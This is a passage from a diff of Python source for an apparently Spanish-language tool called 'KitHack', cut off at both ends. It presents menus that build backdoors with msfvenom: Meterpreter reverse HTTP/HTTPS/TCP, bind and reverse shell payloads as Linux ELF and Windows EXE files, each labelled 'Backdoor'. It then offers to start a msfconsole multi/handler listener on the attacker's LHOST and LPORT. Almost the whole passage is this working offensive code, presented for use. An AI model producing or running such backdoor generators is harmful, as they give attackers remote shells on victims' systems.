+ print("{0}[07]{1} linux/x86/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[08]{1} linux/x86/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[09]{1} linux/x86/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[10]{1} linux/x86/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[11]{1} linux/x86/shell_bind_tcp".format(WHITE, YELLOW)) + print("{0}[12]{1} linux/x86/shell_reverse_tcp".format( + WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "03": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "04": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "05": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x64/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "06": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "07": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "08": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "09": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "10": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "11": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x86/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "12": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p linux/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.elf".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif sys == "02": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} windows/x64/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[02]{1} windows/x64/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[03]{1} windows/x64/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[04]{1} windows/x64/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[05]{1} windows/x64/powershell_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[06]{1} windows/x64/shell_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[07]{1} windows/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[08]{1} windows/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[09]{1} windows/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[10]{1} windows/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[11]{1} windows/meterpreter/reverse_tcp_dns".format( + WHITE, YELLOW)) + print("{0}[12]{1} windows/metsvc_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[13]{1} windows/powershell_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[14]{1} windows/shell_reverse_tcp".format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "03": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "04": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "05": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p windows/x64/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.exe".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "06": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + 